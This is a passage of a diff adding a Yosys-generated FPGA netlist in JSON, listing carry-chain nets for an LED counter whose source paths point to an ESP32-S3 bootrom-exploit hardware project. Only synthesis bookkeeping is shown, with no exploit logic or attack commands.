0, + "bits": [ 138, 27 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:23.11-23.18" + } + }, + "led_run_DFFSE_Q_D": { + "hide_name": 0, + "bits": [ 137 ], + "attributes": { + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0": { + "hide_name": 0, + "bits": [ 139 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 142 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 144 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 146 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 148 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 150 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 152 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 154 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 156 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 158 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 160 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 162 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 164 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 166 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 168 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 170 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 172 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 174 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 176 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 178 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 180 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 182 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 184 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 183 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 181 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 179 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 177 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 175 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 173 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 171 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 169 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 167 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 165 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 163 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 161 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 159 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 157 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 155 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 153 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 151 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 149 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 147 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 145 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 143 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_LUT4_I1_F": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1": { + "hide_name": 0, + "bits": [ 140 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 185 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 187 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 189 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + 